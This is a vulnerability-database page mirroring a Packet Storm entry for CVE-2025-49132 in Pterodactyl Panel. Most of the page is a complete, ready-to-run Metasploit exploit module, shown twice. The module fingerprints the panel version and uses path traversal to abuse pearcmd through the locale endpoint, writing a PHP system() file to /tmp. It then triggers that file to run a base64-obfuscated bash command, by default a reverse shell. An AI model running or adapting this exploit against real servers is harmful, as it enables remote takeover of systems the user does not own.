📄 Pterodactyl Panel Remote Code Execution_PACKETSTORM:215741

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

This Metasploit module exploits a remote code execution vulnerability in Pterodactyl Panel versions before 1.11.11. The vulnerability allows an attacker to write a malicious PHP file via the locale functionality and then execute it to gain a reverse...

Visit Original Source

Basic Information

ID PACKETSTORM:215741

Published Feb 17, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Pterodactyl Panel < 1.11.11 Remote Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://pterodactyl.io/ |
=============================================================================================================================================

[+] Summary : A Remote Code Execution (RCE) vulnerability exists in versions of Pterodactyl Panel prior to 1.11.11.
The issue allows an attacker to abuse the locale functionality to write a malicious PHP file to the server and subsequently execute arbitrary system commands.
Successful exploitation may lead to remote shell access under the privileges of the web server user.

[+] POC :

set RHOSTS target.com
set RPORT 80
set TARGETURI /
set LHOST your_ip
set LPORT your_port

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'
require 'json'
require 'rubygems'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Pterodactyl Panel < 1.11.11 Remote Code Execution',
'Description' => %q{
This module exploits a Remote Code Execution vulnerability in Pterodactyl Panel
versions before 1.11.11. The vulnerability allows an attacker to write a malicious
PHP file via the locale functionality and then execute it to gain a reverse shell.
},
'Author' => [
'pwndalf',
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-49132'],
['URL', 'https://github.com/pwndalf/CVE-2025-49132-PoC']
],
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'Privileged' => false,
'DisclosureDate' => '2025-10-15',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Pterodactyl Panel', '/']),
OptString.new('PEAR_PATH', [true, 'Path to the PHP PEAR library', '/usr/share/php/PEAR/']),
OptString.new('TMP_FILE', [true, 'Temporary file name for payload', 'payload.php'])
]
)
end

def check

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'version')
})

unless res
return CheckCode::Unknown('Connection failed')
end

if res.code == 200 && res.body
version = extract_version(res.body)

if version
vprint_status("Detected Pterodactyl version: #{version}")

begin
current_version = Gem::Version.new(version)
vulnerable_version = Gem::Version.new('1.11.11')

if current_version < vulnerable_version
return CheckCode::Appears("Vulnerable version detected: #{version}")
else
return CheckCode::Safe("Patched version detected: #{version}")
end
rescue ArgumentError => e
vprint_error("Invalid version format: #{e.message}")
return CheckCode::Unknown('Invalid version format')
end
end
end

locale_res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'locales', 'locale.json')
})

if locale_res && locale_res.code == 200
return CheckCode::Detected('Pterodactyl panel detected, but version could not be confirmed')
end

CheckCode::Safe('Target does not appear to be running Pterodactyl panel')
rescue ::Rex::ConnectionError
CheckCode::Unknown('Connection failed')
end

def extract_version(body)

json_data = JSON.parse(body) rescue nil
if json_data.is_a?(Hash) && json_data['version']
return json_data['version']
end

if body =~ /<meta[^>]*name="version"[^>]*content="([^"]+)"[^>]*>/i
return $1
end

if body =~ /Pterodactyl[^<]*v?(\d+\.\d+\.\d+)/i
return $1
end

nil
end

def execute_command(cmd)
encoded_cmd = Base64.strict_encode64(cmd)
payload_cmd = "echo${IFS}#{encoded_cmd}${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash"
write_uri = normalize_uri(target_uri.path, 'locales', 'locale.json')
php_payload = "<?=system('#{payload_cmd}')?>"

print_status("Attempting to write payload to #{datastore['TMP_FILE']}")
write_res = send_request_cgi({
'method' => 'GET',
'uri' => write_uri,
'vars_get' => {
'+config-create+' => '',
'locale' => "../../../../..#{datastore['PEAR_PATH']}",
'namespace' => 'pearcmd',
'/' => php_payload + " /tmp/#{datastore['TMP_FILE']}"
}
}, 10)

unless write_res && write_res.code == 200
fail_with(Failure::NotVulnerable, 'Failed to write payload')
end

print_good("Payload written successfully")

trigger_uri = normalize_uri(target_uri.path, 'locales', 'locale.json')

print_status("Triggering payload...")
begin
send_request_cgi({
'method' => 'GET',
'uri' => trigger_uri,
'vars_get' => {
'locale' => '../../../../../../tmp',
'namespace' => 'payload'
}
}, 5)
rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout

vprint_status('Trigger request completed (expected timeout/error)')
end

print_status('Payload triggered. Check your listener for incoming connection.')

rescue ::Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
end

def exploit

if payload.nil? || !payload.respond_to?(:encoded) || payload.encoded.to_s.empty?
fail_with(Failure::BadConfig, 'No valid payload selected or payload is empty')
end
unless target['Type'] == :unix_cmd && Array(target.arch).include?(ARCH_CMD)
fail_with(Failure::BadConfig, 'Target is not compatible with command payload')
end

print_status("Exploiting #{datastore['RHOSTS']}:#{datastore['RPORT']}")
command = payload.encoded
execute_command(command)
handler
end
end

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-17T18:12:55",
    "description": "This Metasploit module exploits a remote code execution vulnerability in Pterodactyl Panel versions before 1.11.11. The vulnerability allows an attacker to write a malicious PHP file via the locale functionality and then execute it to gain a reverse...",
    "published": "2026-02-17T00:00:00",
    "modified": "2026-02-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pterodactyl Panel Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215741",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-49132"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Pterodactyl Panel < 1.11.11 Remote Code Execution Vulnerability                                                             |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://pterodactyl.io/                                                                                                     |\n    =============================================================================================================================================\n    \n    [+] Summary    : A Remote Code Execution (RCE) vulnerability exists in versions of Pterodactyl Panel prior to 1.11.11.\n                     The issue allows an attacker to abuse the locale functionality to write a malicious PHP file to the server and subsequently execute arbitrary system commands. \n    \t\t\t\t Successful exploitation may lead to remote shell access under the privileges of the web server user.\n    \n    [+] POC : \n    \n    set RHOSTS target.com\n    set RPORT 80\n    set TARGETURI /\n    set LHOST your_ip\n    set LPORT your_port\n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    require 'base64'\n    require 'json'\n    require 'rubygems' \n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Pterodactyl Panel < 1.11.11 Remote Code Execution',\n            'Description' => %q{\n              This module exploits a Remote Code Execution vulnerability in Pterodactyl Panel\n              versions before 1.11.11. The vulnerability allows an attacker to write a malicious\n              PHP file via the locale functionality and then execute it to gain a reverse shell.\n            },\n            'Author' => [\n              'pwndalf', \n              'indoushka' \n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['CVE', '2025-49132'],\n              ['URL', 'https://github.com/pwndalf/CVE-2025-49132-PoC']\n            ],\n            'Platform' => ['unix', 'linux'],\n            'Arch' => [ARCH_CMD],\n            'Targets' => [\n              [\n                'Unix Command',\n                {\n                  'Platform' => 'unix',\n                  'Arch' => ARCH_CMD,\n                  'Type' => :unix_cmd,\n                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n                }\n              ]\n            ],\n            'Privileged' => false,\n            'DisclosureDate' => '2025-10-15',\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            OptString.new('TARGETURI', [true, 'The base path to the Pterodactyl Panel', '/']),\n            OptString.new('PEAR_PATH', [true, 'Path to the PHP PEAR library', '/usr/share/php/PEAR/']),\n            OptString.new('TMP_FILE', [true, 'Temporary file name for payload', 'payload.php'])\n          ]\n        )\n      end\n    \n      def check\n    \n        res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'version')\n        })\n    \n        unless res\n          return CheckCode::Unknown('Connection failed')\n        end\n    \n        if res.code == 200 && res.body\n          version = extract_version(res.body)\n          \n          if version\n            vprint_status(\"Detected Pterodactyl version: #{version}\")\n    \n            begin\n              current_version = Gem::Version.new(version)\n              vulnerable_version = Gem::Version.new('1.11.11')\n              \n              if current_version < vulnerable_version\n                return CheckCode::Appears(\"Vulnerable version detected: #{version}\")\n              else\n                return CheckCode::Safe(\"Patched version detected: #{version}\")\n              end\n            rescue ArgumentError => e\n              vprint_error(\"Invalid version format: #{e.message}\")\n              return CheckCode::Unknown('Invalid version format')\n            end\n          end\n        end\n    \n        locale_res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'locales', 'locale.json')\n        })\n    \n        if locale_res && locale_res.code == 200\n          return CheckCode::Detected('Pterodactyl panel detected, but version could not be confirmed')\n        end\n    \n        CheckCode::Safe('Target does not appear to be running Pterodactyl panel')\n      rescue ::Rex::ConnectionError\n        CheckCode::Unknown('Connection failed')\n      end\n    \n      def extract_version(body)\n    \n        json_data = JSON.parse(body) rescue nil\n        if json_data.is_a?(Hash) && json_data['version']\n          return json_data['version']\n        end\n    \n        if body =~ /<meta[^>]*name=\"version\"[^>]*content=\"([^\"]+)\"[^>]*>/i\n          return $1\n        end\n    \n        if body =~ /Pterodactyl[^<]*v?(\\d+\\.\\d+\\.\\d+)/i\n          return $1\n        end\n    \n        nil\n      end\n    \n      def execute_command(cmd)\n        encoded_cmd = Base64.strict_encode64(cmd)\n        payload_cmd = \"echo${IFS}#{encoded_cmd}${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash\"\n        write_uri = normalize_uri(target_uri.path, 'locales', 'locale.json')\n        php_payload = \"<?=system('#{payload_cmd}')?>\"\n        \n        print_status(\"Attempting to write payload to #{datastore['TMP_FILE']}\")\n        write_res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => write_uri,\n          'vars_get' => {\n            '+config-create+' => '',\n            'locale' => \"../../../../..#{datastore['PEAR_PATH']}\",\n            'namespace' => 'pearcmd',\n            '/' => php_payload + \" /tmp/#{datastore['TMP_FILE']}\"\n          }\n        }, 10) \n        \n        unless write_res && write_res.code == 200\n          fail_with(Failure::NotVulnerable, 'Failed to write payload')\n        end\n        \n        print_good(\"Payload written successfully\")\n    \n        trigger_uri = normalize_uri(target_uri.path, 'locales', 'locale.json')\n        \n        print_status(\"Triggering payload...\")\n        begin\n          send_request_cgi({\n            'method' => 'GET',\n            'uri' => trigger_uri,\n            'vars_get' => {\n              'locale' => '../../../../../../tmp',\n              'namespace' => 'payload'\n            }\n          }, 5) \n        rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout\n    \n          vprint_status('Trigger request completed (expected timeout/error)')\n        end\n        \n        print_status('Payload triggered. Check your listener for incoming connection.')\n        \n      rescue ::Rex::ConnectionError => e\n        fail_with(Failure::Unreachable, e.message)\n      end\n    \n      def exploit\n    \n        if payload.nil? || !payload.respond_to?(:encoded) || payload.encoded.to_s.empty?\n          fail_with(Failure::BadConfig, 'No valid payload selected or payload is empty')\n        end\n        unless target['Type'] == :unix_cmd && Array(target.arch).include?(ARCH_CMD)\n          fail_with(Failure::BadConfig, 'Target is not compatible with command payload')\n        end\n        \n        print_status(\"Exploiting #{datastore['RHOSTS']}:#{datastore['RPORT']}\")\n        command = payload.encoded\n        execute_command(command)\n         handler\n      end\n    end\n    \t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215741",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215741/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply